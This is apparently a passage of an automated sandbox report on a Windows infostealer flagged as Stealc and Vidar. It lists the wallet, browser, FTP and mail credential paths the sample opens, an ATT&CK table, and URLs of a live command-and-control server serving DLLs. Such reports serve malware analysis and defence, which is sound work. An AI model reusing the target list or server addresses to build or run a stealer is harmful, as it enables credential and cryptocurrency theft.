Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fpge_exty
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\le"

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 1476, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2040063346.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2238243370.000000000137E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 1476, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 1476, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true		unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllr	file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpse	file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	KKKEBKJJDGHCBGCAAKEH.0.dr	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	false		unknown
http://185.215.113.37/0d	file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.2238243370.000000000137E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpr	file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpGO	file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpp	file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpATE	file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpo	file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpH;	file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpJ$S	file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dlla	file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2268891317.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dlls	file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phprname	file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpT	file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll:	file.exe, 00000000.00000002.2238243370.00000000013C3000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	false		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dllo	file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2109711519.000000000141E000.00000004.00000020.00020000.00000000.sdmp, JKFIDGDH.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.php0	file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dlle	file.exe, 00000000.00000002.2238243370.00000000013D6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.2238243370.0000000001370000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2263010291.0000000029BD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238243370.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	false		unknown
